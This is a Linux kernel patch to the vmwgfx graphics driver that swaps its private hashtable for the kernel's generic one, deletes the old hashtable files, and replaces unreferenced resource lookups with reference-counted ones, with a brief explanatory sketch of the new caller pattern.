+@@ -970,7 +1012,7 @@ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ 		goto out_err0;
+ 	}
+ 
+-	dev_priv->tdev = ttm_object_device_init(12, &vmw_prime_dmabuf_ops);
++	dev_priv->tdev = ttm_object_device_init(&vmw_prime_dmabuf_ops);
+ 
+ 	if (unlikely(dev_priv->tdev == NULL)) {
+ 		drm_err(&dev_priv->drm,
+@@ -1091,6 +1133,7 @@ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ 	vmw_host_printf("vmwgfx: Module Version: %d.%d.%d (kernel: %s)",
+ 			VMWGFX_DRIVER_MAJOR, VMWGFX_DRIVER_MINOR,
+ 			VMWGFX_DRIVER_PATCHLEVEL, UTS_RELEASE);
++	vmw_write_driver_id(dev_priv);
+ 
+ 	if (dev_priv->enable_fb) {
+ 		vmw_fifo_resource_inc(dev_priv);
+@@ -1143,9 +1186,7 @@ static void vmw_driver_unload(struct drm_device *dev)
+ 
+ 	unregister_pm_notifier(&dev_priv->pm_nb);
+ 
+-	if (dev_priv->ctx.res_ht_initialized)
+-		vmwgfx_ht_remove(&dev_priv->ctx.res_ht);
+-	vfree(dev_priv->ctx.cmd_bounce);
++	vmw_sw_context_fini(dev_priv);
+ 	if (dev_priv->enable_fb) {
+ 		vmw_fb_off(dev_priv);
+ 		vmw_fb_close(dev_priv);
+@@ -1173,8 +1214,6 @@ static void vmw_driver_unload(struct drm_device *dev)
+ 		vmw_irq_uninstall(&dev_priv->drm);
+ 
+ 	ttm_object_device_release(&dev_priv->tdev);
+-	if (dev_priv->ctx.staged_bindings)
+-		vmw_binding_state_free(dev_priv->ctx.staged_bindings);
+ 
+ 	for (i = vmw_res_context; i < vmw_res_max; ++i)
+ 		idr_destroy(&dev_priv->res_idr[i]);
+@@ -1203,7 +1242,7 @@ static int vmw_driver_open(struct drm_device *dev, struct drm_file *file_priv)
+ 	if (unlikely(!vmw_fp))
+ 		return ret;
+ 
+-	vmw_fp->tfile = ttm_object_file_init(dev_priv->tdev, 10);
++	vmw_fp->tfile = ttm_object_file_init(dev_priv->tdev);
+ 	if (unlikely(vmw_fp->tfile == NULL))
+ 		goto out_no_tfile;
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+index 09e2d738aa876..0bc1ebc43002b 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+@@ -30,6 +30,7 @@
+ 
+ #include <linux/suspend.h>
+ #include <linux/sync_file.h>
++#include <linux/hashtable.h>
+ 
+ #include <drm/drm_auth.h>
+ #include <drm/drm_device.h>
+@@ -42,7 +43,6 @@
+ #include "ttm_object.h"
+ 
+ #include "vmwgfx_fence.h"
+-#include "vmwgfx_hashtab.h"
+ #include "vmwgfx_reg.h"
+ #include "vmwgfx_validation.h"
+ 
+@@ -93,6 +93,7 @@
+ #define VMW_RES_STREAM ttm_driver_type2
+ #define VMW_RES_FENCE ttm_driver_type3
+ #define VMW_RES_SHADER ttm_driver_type4
++#define VMW_RES_HT_ORDER 12
+ 
+ #define MKSSTAT_CAPACITY_LOG2 5U
+ #define MKSSTAT_CAPACITY (1U << MKSSTAT_CAPACITY_LOG2)
+@@ -102,6 +103,11 @@ struct vmw_fpriv {
+ 	bool gb_aware; /* user-space is guest-backed aware */
+ };
+ 
++struct vmwgfx_hash_item {
++	struct hlist_node head;
++	unsigned long key;
++};
++
+ /**
+  * struct vmw_buffer_object - TTM buffer object with vmwgfx additions
+  * @base: The TTM buffer object
+@@ -425,8 +431,7 @@ struct vmw_ctx_validation_info;
+  * @ctx: The validation context
+  */
+ struct vmw_sw_context{
+-	struct vmwgfx_open_hash res_ht;
+-	bool res_ht_initialized;
++	DECLARE_HASHTABLE(res_ht, VMW_RES_HT_ORDER);
+ 	bool kernel;
+ 	struct vmw_fpriv *fp;
+ 	struct drm_file *filp;
+@@ -821,12 +826,7 @@ extern int vmw_user_resource_lookup_handle(
+ 	uint32_t handle,
+ 	const struct vmw_user_resource_conv *converter,
+ 	struct vmw_resource **p_res);
+-extern struct vmw_resource *
+-vmw_user_resource_noref_lookup_handle(struct vmw_private *dev_priv,
+-				      struct ttm_object_file *tfile,
+-				      uint32_t handle,
+-				      const struct vmw_user_resource_conv *
+-				      converter);
++
+ extern int vmw_stream_claim_ioctl(struct drm_device *dev, void *data,
+ 				  struct drm_file *file_priv);
+ extern int vmw_stream_unref_ioctl(struct drm_device *dev, void *data,
+@@ -865,15 +865,6 @@ static inline bool vmw_resource_mob_attached(const struct vmw_resource *res)
+ 	return !RB_EMPTY_NODE(&res->mob_node);
+ }
+ 
+-/**
+- * vmw_user_resource_noref_release - release a user resource pointer looked up
+- * without reference
+- */
+-static inline void vmw_user_resource_noref_release(void)
+-{
+-	ttm_base_object_noref_release();
+-}
+-
+ /**
+  * Buffer object helper functions - vmwgfx_bo.c
+  */
+@@ -925,8 +916,6 @@ extern void vmw_bo_unmap(struct vmw_buffer_object *vbo);
+ extern void vmw_bo_move_notify(struct ttm_buffer_object *bo,
+ 			       struct ttm_resource *mem);
+ extern void vmw_bo_swap_notify(struct ttm_buffer_object *bo);
+-extern struct vmw_buffer_object *
+-vmw_user_bo_noref_lookup(struct drm_file *filp, u32 handle);
+ 
+ /**
+  * vmw_bo_adjust_prio - Adjust the buffer object eviction priority
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+index f085dbd4736d5..70cfed4fdba04 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+@@ -1,7 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0 OR MIT
+ /**************************************************************************
+  *
+- * Copyright 2009 - 2015 VMware, Inc., Palo Alto, CA., USA
++ * Copyright 2009 - 2022 VMware, Inc., Palo Alto, CA., USA
+  *
+  * Permission is hereby granted, free of charge, to any person obtaining a
+  * copy of this software and associated documentation files (the
+@@ -25,6 +25,7 @@
+  *
+  **************************************************************************/
+ #include <linux/sync_file.h>
++#include <linux/hashtable.h>
+ 
+ #include "vmwgfx_drv.h"
+ #include "vmwgfx_reg.h"
+@@ -34,7 +35,6 @@
+ #include "vmwgfx_binding.h"
+ #include "vmwgfx_mksstat.h"
+ 
+-#define VMW_RES_HT_ORDER 12
+ 
+ /*
+  * Helper macro to get dx_ctx_node if available otherwise print an error
+@@ -290,20 +290,26 @@ static void vmw_execbuf_rcache_update(struct vmw_res_cache_entry *rcache,
+ 	rcache->valid_handle = 0;
+ }
+ 
++enum vmw_val_add_flags {
++	vmw_val_add_flag_none  =      0,
++	vmw_val_add_flag_noctx = 1 << 0,
++};
++
+ /**
+- * vmw_execbuf_res_noref_val_add - Add a resource described by an unreferenced
+- * rcu-protected pointer to the validation list.
++ * vmw_execbuf_res_val_add - Add a resource to the validation list.
+  *
+  * @sw_context: Pointer to the software context.
+  * @res: Unreferenced rcu-protected pointer to the resource.
+  * @dirty: Whether to change dirty status.
++ * @flags: specifies whether to use the context or not
+  *
+  * Returns: 0 on success. Negative error code on failure. Typical error codes
+  * are %-EINVAL on inconsistency and %-ESRCH if the resource was doomed.
+  */
+-static int vmw_execbuf_res_noref_val_add(struct vmw_sw_context *sw_context,
+-					 struct vmw_resource *res,
+-					 u32 dirty)
++static int vmw_execbuf_res_val_add(struct vmw_sw_context *sw_context,
++				   struct vmw_resource *res,
++				   u32 dirty,
++				   u32 flags)
+ {
+ 	struct vmw_private *dev_priv = res->dev_priv;
+ 	int ret;
+@@ -318,24 +324,30 @@ static int vmw_execbuf_res_noref_val_add(struct vmw_sw_context *sw_context,
+ 		if (dirty)
+ 			vmw_validation_res_set_dirty(sw_context->ctx,
+ 						     rcache->private, dirty);
+-		vmw_user_resource_noref_release();
+ 		return 0;
+ 	}
+ 
+-	priv_size = vmw_execbuf_res_size(dev_priv, res_type);
+-	ret = vmw_validation_add_resource(sw_context->ctx, res, priv_size,
+-					  dirty, (void **)&ctx_info,
+-					  &first_usage);
+-	vmw_user_resource_noref_release();
+-	if (ret)
+-		return ret;
++	if ((flags & vmw_val_add_flag_noctx) != 0) {
++		ret = vmw_validation_add_resource(sw_context->ctx, res, 0, dirty,
++						  (void **)&ctx_info, NULL);
++		if (ret)
++			return ret;
+ 
+-	if (priv_size && first_usage) {
+-		ret = vmw_cmd_ctx_first_setup(dev_priv, sw_context, res,
+-					      ctx_info);
+-		if (ret) {
+-			VMW_DEBUG_USER("Failed first usage context setup.\n");
++	} else {
++		priv_size = vmw_execbuf_res_size(dev_priv, res_type);
++		ret = vmw_validation_add_resource(sw_context->ctx, res, priv_size,
++						  dirty, (void **)&ctx_info,
++						  &first_usage);
++		if (ret)
+ 			return ret;
++
++		if (priv_size && first_usage) {
++			ret = vmw_cmd_ctx_first_setup(dev_priv, sw_context, res,
++						      ctx_info);
++			if (ret) {
++				VMW_DEBUG_USER("Failed first usage context setup.\n");
++				return ret;
++			}
+ 		}
+ 	}
+ 
+@@ -343,43 +355,6 @@ static int vmw_execbuf_res_noref_val_add(struct vmw_sw_context *sw_context,
+ 	return 0;
+ }
+ 
+-/**
+- * vmw_execbuf_res_noctx_val_add - Add a non-context resource to the resource
+- * validation list if it's not already on it
+- *
+- * @sw_context: Pointer to the software context.
+- * @res: Pointer to the resource.
+- * @dirty: Whether to change dirty status.
+- *
+- * Returns: Zero on success. Negative error code on failure.
+- */
+-static int vmw_execbuf_res_noctx_val_add(struct vmw_sw_context *sw_context,
+-					 struct vmw_resource *res,
+-					 u32 dirty)
+-{
+-	struct vmw_res_cache_entry *rcache;
+-	enum vmw_res_type res_type = vmw_res_type(res);
+-	void *ptr;
+-	int ret;
+-
+-	rcache = &sw_context->res_cache[res_type];
+-	if (likely(rcache->valid && rcache->res == res)) {
+-		if (dirty)
+-			vmw_validation_res_set_dirty(sw_context->ctx,
+-						     rcache->private, dirty);
+-		return 0;
+-	}
+-
+-	ret = vmw_validation_add_resource(sw_context->ctx, res, 0, dirty,
+-					  &ptr, NULL);
+-	if (ret)
+-		return ret;
+-
+-	vmw_execbuf_rcache_update(rcache, res, ptr);
+-
+-	return 0;
+-}
+-
+ /**
+  * vmw_view_res_val_add - Add a view and the surface it's pointing to to the
+  * validation list
+@@ -398,13 +373,13 @@ static int vmw_view_res_val_add(struct vmw_sw_context *sw_context,
+ 	 * First add the resource the view is pointing to, otherwise it may be
+ 	 * swapped out when the view is validated.
+ 	 */
+-	ret = vmw_execbuf_res_noctx_val_add(sw_context, vmw_view_srf(view),
+-					    vmw_view_dirtying(view));
++	ret = vmw_execbuf_res_val_add(sw_context, vmw_view_srf(view),
++				      vmw_view_dirtying(view), vmw_val_add_flag_noctx);
+ 	if (ret)
+ 		return ret;
+ 
+-	return vmw_execbuf_res_noctx_val_add(sw_context, view,
+-					     VMW_RES_DIRTY_NONE);
++	return vmw_execbuf_res_val_add(sw_context, view, VMW_RES_DIRTY_NONE,
++				       vmw_val_add_flag_noctx);
+ }
+ 
+ /**
+@@ -475,8 +450,9 @@ static int vmw_resource_context_res_add(struct vmw_private *dev_priv,
+ 			if (IS_ERR(res))
+ 				continue;
+ 
+-			ret = vmw_execbuf_res_noctx_val_add(sw_context, res,
+-							    VMW_RES_DIRTY_SET);
++			ret = vmw_execbuf_res_val_add(sw_context, res,
++						      VMW_RES_DIRTY_SET,
++						      vmw_val_add_flag_noctx);
+ 			if (unlikely(ret != 0))
+ 				return ret;
+ 		}
+@@ -490,9 +466,9 @@ static int vmw_resource_context_res_add(struct vmw_private *dev_priv,
+ 		if (vmw_res_type(entry->res) == vmw_res_view)
+ 			ret = vmw_view_res_val_add(sw_context, entry->res);
+ 		else
+-			ret = vmw_execbuf_res_noctx_val_add
+-				(sw_context, entry->res,
+-				 vmw_binding_dirtying(entry->bt));
++			ret = vmw_execbuf_res_val_add(sw_context, entry->res,
++						      vmw_binding_dirtying(entry->bt),
++						      vmw_val_add_flag_noctx);
+ 		if (unlikely(ret != 0))
+ 			break;
+ 	}
+@@ -658,7 +634,8 @@ vmw_cmd_res_check(struct vmw_private *dev_priv,
+ {
+ 	struct vmw_res_cache_entry *rcache = &sw_context->res_cache[res_type];
+ 	struct vmw_resource *res;
+-	int ret;
++	int ret = 0;
++	bool needs_unref = false;
+ 
+ 	if (p_res)
+ 		*p_res = NULL;
+@@ -683,17 +660,18 @@ vmw_cmd_res_check(struct vmw_private *dev_priv,
+ 		if (ret)
+ 			return ret;
+ 
+-		res = vmw_user_resource_noref_lookup_handle
+-			(dev_priv, sw_context->fp->tfile, *id_loc, converter);
+-		if (IS_ERR(res)) {
++		ret = vmw_user_resource_lookup_handle
++			(dev_priv, sw_context->fp->tfile, *id_loc, converter, &res);
++		if (ret != 0) {
+ 			VMW_DEBUG_USER("Could not find/use resource 0x%08x.\n",
+ 				       (unsigned int) *id_loc);
+-			return PTR_ERR(res);
++			return ret;
+ 		}
++		needs_unref = true;
+ 
+-		ret = vmw_execbuf_res_noref_val_add(sw_context, res, dirty);
++		ret = vmw_execbuf_res_val_add(sw_context, res, dirty, vmw_val_add_flag_none);
+ 		if (unlikely(ret != 0))
+-			return ret;
++			goto res_check_done;
+ 
+ 		if (rcache->valid && rcache->res == res) {
+ 			rcache->valid_handle = true;
+@@ -708,7 +686,11 @@ vmw_cmd_res_check(struct vmw_private *dev_priv,
+ 	if (p_res)
+ 		*p_res = res;
+ 
+-	return 0;
++res_check_done:
++	if (needs_unref)
++		vmw_resource_unreference(&res);
++
++	return ret;
+ }
+ 
+ /**
+@@ -1171,9 +1153,9 @@ static int vmw_translate_mob_ptr(struct vmw_private *dev_priv,
+ 	int ret;
+ 
+ 	vmw_validation_preload_bo(sw_context->ctx);
+-	vmw_bo = vmw_user_bo_noref_lookup(sw_context->filp, handle);
+-	if (IS_ERR(vmw_bo)) {
+-		VMW_DEBUG_USER("Could not find or use MOB buffer.\n");
++	ret = vmw_user_bo_lookup(sw_context->filp, handle, &vmw_bo);
++	if (ret != 0) {
++		drm_dbg(&dev_priv->drm, "Could not find or use MOB buffer.\n");
+-		return PTR_ERR(vmw_bo);
++		return ret;
+ 	}
+ 	ret = vmw_validation_add_bo(sw_context->ctx, vmw_bo, true, false);
+@@ -1225,9 +1207,9 @@ static int vmw_translate_guest_ptr(struct vmw_private *dev_priv,
+ 	int ret;
+ 
+ 	vmw_validation_preload_bo(sw_context->ctx);
+-	vmw_bo = vmw_user_bo_noref_lookup(sw_context->filp, handle);
+-	if (IS_ERR(vmw_bo)) {
+-		VMW_DEBUG_USER("Could not find or use GMR region.\n");
++	ret = vmw_user_bo_lookup(sw_context->filp, handle, &vmw_bo);
++	if (ret != 0) {
++		drm_dbg(&dev_priv->drm, "Could not find or use GMR region.\n");
+-		return PTR_ERR(vmw_bo);
++		return ret;
+ 	}
+ 	ret = vmw_validation_add_bo(sw_context->ctx, vmw_bo, false, false);
+@@ -2025,8 +2007,9 @@ static int vmw_cmd_set_shader(struct vmw_private *dev_priv,
+ 		res = vmw_shader_lookup(vmw_context_res_man(ctx),
+ 					cmd->body.shid, cmd->body.type);
+ 		if (!IS_ERR(res)) {
+-			ret = vmw_execbuf_res_noctx_val_add(sw_context, res,
+-							    VMW_RES_DIRTY_NONE);
++			ret = vmw_execbuf_res_val_add(sw_context, res,
++						      VMW_RES_DIRTY_NONE,
++						      vmw_val_add_flag_noctx);
+ 			if (unlikely(ret != 0))
+ 				return ret;
+ 
+@@ -2273,8 +2256,9 @@ static int vmw_cmd_dx_set_shader(struct vmw_private *dev_priv,
+ 			return PTR_ERR(res);
+ 		}
+ 
+-		ret = vmw_execbuf_res_noctx_val_add(sw_context, res,
+-						    VMW_RES_DIRTY_NONE);
++		ret = vmw_execbuf_res_val_add(sw_context, res,
++					      VMW_RES_DIRTY_NONE,
++					      vmw_val_add_flag_noctx);
+ 		if (ret)
+ 			return ret;
+ 	}
+@@ -2777,8 +2761,8 @@ static int vmw_cmd_dx_bind_shader(struct vmw_private *dev_priv,
+ 		return PTR_ERR(res);
+ 	}
+ 
+-	ret = vmw_execbuf_res_noctx_val_add(sw_context, res,
+-					    VMW_RES_DIRTY_NONE);
++	ret = vmw_execbuf_res_val_add(sw_context, res, VMW_RES_DIRTY_NONE,
++				      vmw_val_add_flag_noctx);
+ 	if (ret) {
+ 		VMW_DEBUG_USER("Error creating resource validation node.\n");
+ 		return ret;
+@@ -3098,8 +3082,8 @@ static int vmw_cmd_dx_bind_streamoutput(struct vmw_private *dev_priv,
+ 
+ 	vmw_dx_streamoutput_set_size(res, cmd->body.sizeInBytes);
+ 
+-	ret = vmw_execbuf_res_noctx_val_add(sw_context, res,
+-					    VMW_RES_DIRTY_NONE);
++	ret = vmw_execbuf_res_val_add(sw_context, res, VMW_RES_DIRTY_NONE,
++				      vmw_val_add_flag_noctx);
+ 	if (ret) {
+ 		DRM_ERROR("Error creating resource validation node.\n");
+ 		return ret;
+@@ -3148,8 +3132,8 @@ static int vmw_cmd_dx_set_streamoutput(struct vmw_private *dev_priv,
+ 		return 0;
+ 	}
+ 
+-	ret = vmw_execbuf_res_noctx_val_add(sw_context, res,
+-					    VMW_RES_DIRTY_NONE);
++	ret = vmw_execbuf_res_val_add(sw_context, res, VMW_RES_DIRTY_NONE,
++				      vmw_val_add_flag_noctx);
+ 	if (ret) {
+ 		DRM_ERROR("Error creating resource validation node.\n");
+ 		return ret;
+@@ -4067,22 +4051,26 @@ static int vmw_execbuf_tie_context(struct vmw_private *dev_priv,
+ 	if (ret)
+ 		return ret;
+ 
+-	res = vmw_user_resource_noref_lookup_handle
++	ret = vmw_user_resource_lookup_handle
+ 		(dev_priv, sw_context->fp->tfile, handle,
+-		 user_context_converter);
+-	if (IS_ERR(res)) {
++		 user_context_converter, &res);
++	if (ret != 0) {
+ 		VMW_DEBUG_USER("Could not find or use DX context 0x%08x.\n",
+ 			       (unsigned int) handle);
+-		return PTR_ERR(res);
++		return ret;
+ 	}
+ 
+-	ret = vmw_execbuf_res_noref_val_add(sw_context, res, VMW_RES_DIRTY_SET);
+-	if (unlikely(ret != 0))
++	ret = vmw_execbuf_res_val_add(sw_context, res, VMW_RES_DIRTY_SET,
++				      vmw_val_add_flag_none);
++	if (unlikely(ret != 0)) {
++		vmw_resource_unreference(&res);
+ 		return ret;
++	}
+ 
+ 	sw_context->dx_ctx_node = vmw_execbuf_info_from_res(sw_context, res);
+ 	sw_context->man = vmw_context_res_man(res);
+ 
++	vmw_resource_unreference(&res);
+ 	return 0;
+ }
+ 
+@@ -4101,7 +4089,7 @@ int vmw_execbuf_process(struct drm_file *file_priv,
+ 	int ret;
+ 	int32_t out_fence_fd = -1;
+ 	struct sync_file *sync_file = NULL;
+-	DECLARE_VAL_CONTEXT(val_ctx, &sw_context->res_ht, 1);
++	DECLARE_VAL_CONTEXT(val_ctx, sw_context, 1);
+ 
+ 	if (flags & DRM_VMW_EXECBUF_FLAG_EXPORT_FENCE_FD) {
+ 		out_fence_fd = get_unused_fd_flags(O_CLOEXEC);
+@@ -4164,14 +4152,6 @@ int vmw_execbuf_process(struct drm_file *file_priv,
+ 	if (sw_context->staged_bindings)
+ 		vmw_binding_state_reset(sw_context->staged_bindings);
+ 
+-	if (!sw_context->res_ht_initialized) {
+-		ret = vmwgfx_ht_create(&sw_context->res_ht, VMW_RES_HT_ORDER);
+-		if (unlikely(ret != 0))
+-			goto out_unlock;
+-
+-		sw_context->res_ht_initialized = true;
+-	}
+-
+ 	INIT_LIST_HEAD(&sw_context->staged_cmd_res);
+ 	sw_context->ctx = &val_ctx;
+ 	ret = vmw_execbuf_tie_context(dev_priv, sw_context, dx_context_handle);
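
The execbuf conversion collapses vmw_execbuf_res_noref_val_add() and vmw_execbuf_res_noctx_val_add() into a single vmw_execbuf_res_val_add() selected by a flags word, and, with the noref lookups gone, every caller now takes a real reference and drops it itself once the validation list holds its own. A condensed sketch of the resulting caller shape (dev_priv and user_context_converter as in the surrounding code; error handling trimmed):

    static int add_res_for_handle(struct vmw_private *dev_priv,
                                  struct vmw_sw_context *sw_context,
                                  uint32_t handle)
    {
        struct vmw_resource *res;
        int ret;

        ret = vmw_user_resource_lookup_handle(dev_priv, sw_context->fp->tfile,
                                              handle, user_context_converter,
                                              &res);
        if (ret != 0)
            return ret;                  /* nothing referenced yet */

        ret = vmw_execbuf_res_val_add(sw_context, res, VMW_RES_DIRTY_SET,
                                      vmw_val_add_flag_none);
        vmw_resource_unreference(&res);  /* list keeps its own reference */
        return ret;
    }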
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_hashtab.c b/drivers/gpu/drm/vmwgfx/vmwgfx_hashtab.c
+deleted file mode 100644
+index 06aebc12774e7..0000000000000
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_hashtab.c
++++ /dev/null
+@@ -1,199 +0,0 @@
+-/*
+- * Copyright 2006 Tungsten Graphics, Inc., Bismarck, ND. USA.
+- * All Rights Reserved.
+- *
+- * Permission is hereby granted, free of charge, to any person obtaining a
+- * copy of this software and associated documentation files (the
+- * "Software"), to deal in the Software without restriction, including
+- * without limitation the rights to use, copy, modify, merge, publish,
+- * distribute, sub license, and/or sell copies of the Software, and to
+- * permit persons to whom the Software is furnished to do so, subject to
+- * the following conditions:
+- *
+- * The above copyright notice and this permission notice (including the
+- * next paragraph) shall be included in all copies or substantial portions
+- * of the Software.
+- *
+- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+- * FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
+- * THE COPYRIGHT HOLDERS, AUTHORS AND/OR ITS SUPPLIERS BE LIABLE FOR ANY CLAIM,
+- * DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
+- * OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
+- * USE OR OTHER DEALINGS IN THE SOFTWARE.
+- */
+-
+-/*
+- * Simple open hash tab implementation.
+- *
+- * Authors:
+- * Thomas Hellström <thomas-at-tungstengraphics-dot-com>
+- */
+-
+-#include <linux/export.h>
+-#include <linux/hash.h>
+-#include <linux/mm.h>
+-#include <linux/rculist.h>
+-#include <linux/slab.h>
+-#include <linux/vmalloc.h>
+-
+-#include <drm/drm_print.h>
+-
+-#include "vmwgfx_hashtab.h"
+-
+-int vmwgfx_ht_create(struct vmwgfx_open_hash *ht, unsigned int order)
+-{
+-	unsigned int size = 1 << order;
+-
+-	ht->order = order;
+-	ht->table = NULL;
+-	if (size <= PAGE_SIZE / sizeof(*ht->table))
+-		ht->table = kcalloc(size, sizeof(*ht->table), GFP_KERNEL);
+-	else
+-		ht->table = vzalloc(array_size(size, sizeof(*ht->table)));
+-	if (!ht->table) {
+-		DRM_ERROR("Out of memory for hash table\n");
+-		return -ENOMEM;
+-	}
+-	return 0;
+-}
+-
+-void vmwgfx_ht_verbose_list(struct vmwgfx_open_hash *ht, unsigned long key)
+-{
+-	struct vmwgfx_hash_item *entry;
+-	struct hlist_head *h_list;
+-	unsigned int hashed_key;
+-	int count = 0;
+-
+-	hashed_key = hash_long(key, ht->order);
+-	DRM_DEBUG("Key is 0x%08lx, Hashed key is 0x%08x\n", key, hashed_key);
+-	h_list = &ht->table[hashed_key];
+-	hlist_for_each_entry(entry, h_list, head)
+-		DRM_DEBUG("count %d, key: 0x%08lx\n", count++, entry->key);
+-}
+-
+-static struct hlist_node *vmwgfx_ht_find_key(struct vmwgfx_open_hash *ht, unsigned long key)
+-{
+-	struct vmwgfx_hash_item *entry;
+-	struct hlist_head *h_list;
+-	unsigned int hashed_key;
+-
+-	hashed_key = hash_long(key, ht->order);
+-	h_list = &ht->table[hashed_key];
+-	hlist_for_each_entry(entry, h_list, head) {
+-		if (entry->key == key)
+-			return &entry->head;
+-		if (entry->key > key)
+-			break;
+-	}
+-	return NULL;
+-}
+-
+-static struct hlist_node *vmwgfx_ht_find_key_rcu(struct vmwgfx_open_hash *ht, unsigned long key)
+-{
+-	struct vmwgfx_hash_item *entry;
+-	struct hlist_head *h_list;
+-	unsigned int hashed_key;
+-
+-	hashed_key = hash_long(key, ht->order);
+-	h_list = &ht->table[hashed_key];
+-	hlist_for_each_entry_rcu(entry, h_list, head) {
+-		if (entry->key == key)
+-			return &entry->head;
+-		if (entry->key > key)
+-			break;
+-	}
+-	return NULL;
+-}
+-
+-int vmwgfx_ht_insert_item(struct vmwgfx_open_hash *ht, struct vmwgfx_hash_item *item)
+-{
+-	struct vmwgfx_hash_item *entry;
+-	struct hlist_head *h_list;
+-	struct hlist_node *parent;
+-	unsigned int hashed_key;
+-	unsigned long key = item->key;
+-
+-	hashed_key = hash_long(key, ht->order);
+-	h_list = &ht->table[hashed_key];
+-	parent = NULL;
+-	hlist_for_each_entry(entry, h_list, head) {
+-		if (entry->key == key)
+-			return -EINVAL;
+-		if (entry->key > key)
+-			break;
+-		parent = &entry->head;
+-	}
+-	if (parent)
+-		hlist_add_behind_rcu(&item->head, parent);
+-	else
+-		hlist_add_head_rcu(&item->head, h_list);
+-	return 0;
+-}
+-
+-/*
+- * Just insert an item and return any "bits" bit key that hasn't been
+- * used before.
+- */
+-int vmwgfx_ht_just_insert_please(struct vmwgfx_open_hash *ht, struct vmwgfx_hash_item *item,
+-				 unsigned long seed, int bits, int shift,
+-				 unsigned long add)
+-{
+-	int ret;
+-	unsigned long mask = (1UL << bits) - 1;
+-	unsigned long first, unshifted_key;
+-
+-	unshifted_key = hash_long(seed, bits);
+-	first = unshifted_key;
+-	do {
+-		item->key = (unshifted_key << shift) + add;
+-		ret = vmwgfx_ht_insert_item(ht, item);
+-		if (ret)
+-			unshifted_key = (unshifted_key + 1) & mask;
+-	} while (ret && (unshifted_key != first));
+-
+-	if (ret) {
+-		DRM_ERROR("Available key bit space exhausted\n");
+-		return -EINVAL;
+-	}
+-	return 0;
+-}
+-
+-int vmwgfx_ht_find_item(struct vmwgfx_open_hash *ht, unsigned long key,
+-			struct vmwgfx_hash_item **item)
+-{
+-	struct hlist_node *list;
+-
+-	list = vmwgfx_ht_find_key_rcu(ht, key);
+-	if (!list)
+-		return -EINVAL;
+-
+-	*item = hlist_entry(list, struct vmwgfx_hash_item, head);
+-	return 0;
+-}
+-
+-int vmwgfx_ht_remove_key(struct vmwgfx_open_hash *ht, unsigned long key)
+-{
+-	struct hlist_node *list;
+-
+-	list = vmwgfx_ht_find_key(ht, key);
+-	if (list) {
+-		hlist_del_init_rcu(list);
+-		return 0;
+-	}
+-	return -EINVAL;
+-}
+-
+-int vmwgfx_ht_remove_item(struct vmwgfx_open_hash *ht, struct vmwgfx_hash_item *item)
+-{
+-	hlist_del_init_rcu(&item->head);
+-	return 0;
+-}
+-
+-void vmwgfx_ht_remove(struct vmwgfx_open_hash *ht)
+-{
+-	if (ht->table) {
+-		kvfree(ht->table);
+-		ht->table = NULL;
+-	}
+-}
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_hashtab.h b/drivers/gpu/drm/vmwgfx/vmwgfx_hashtab.h
+deleted file mode 100644
+index a9ce12922e21c..0000000000000
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_hashtab.h
++++ /dev/null
+@@ -1,83 +0,0 @@
+-/*
+- * Copyright 2006 Tungsten Graphics, Inc., Bismarck, ND. USA.
+- * All Rights Reserved.
+- *
+- * Permission is hereby granted, free of charge, to any person obtaining a
+- * copy of this software and associated documentation files (the
+- * "Software"), to deal in the Software without restriction, including
+- * without limitation the rights to use, copy, modify, merge, publish,
+- * distribute, sub license, and/or sell copies of the Software, and to
+- * permit persons to whom the Software is furnished to do so, subject to
+- * the following conditions:
+- *
+- * The above copyright notice and this permission notice (including the
+- * next paragraph) shall be included in all copies or substantial portions
+- * of the Software.
+- *
+- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+- * FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
+- * THE COPYRIGHT HOLDERS, AUTHORS AND/OR ITS SUPPLIERS BE LIABLE FOR ANY CLAIM,
+- * DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
+- * OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
+- * USE OR OTHER DEALINGS IN THE SOFTWARE.
+- */
+-
+-/*
+- * Simple open hash tab implementation.
+- *
+- * Authors:
+- * Thomas Hellström <thomas-at-tungstengraphics-dot-com>
+- */
+-
+-/*
+- * TODO: Replace this hashtable with Linux' generic implementation
+- *       from <linux/hashtable.h>.
+- */
+-
+-#ifndef VMWGFX_HASHTAB_H
+-#define VMWGFX_HASHTAB_H
+-
+-#include <linux/list.h>
+-
+-#define drm_hash_entry(_ptr, _type, _member) container_of(_ptr, _type, _member)
+-
+-struct vmwgfx_hash_item {
+-	struct hlist_node head;
+-	unsigned long key;
+-};
+-
+-struct vmwgfx_open_hash {
+-	struct hlist_head *table;
+-	u8 order;
+-};
+-
+-int vmwgfx_ht_create(struct vmwgfx_open_hash *ht, unsigned int order);
+-int vmwgfx_ht_insert_item(struct vmwgfx_open_hash *ht, struct vmwgfx_hash_item *item);
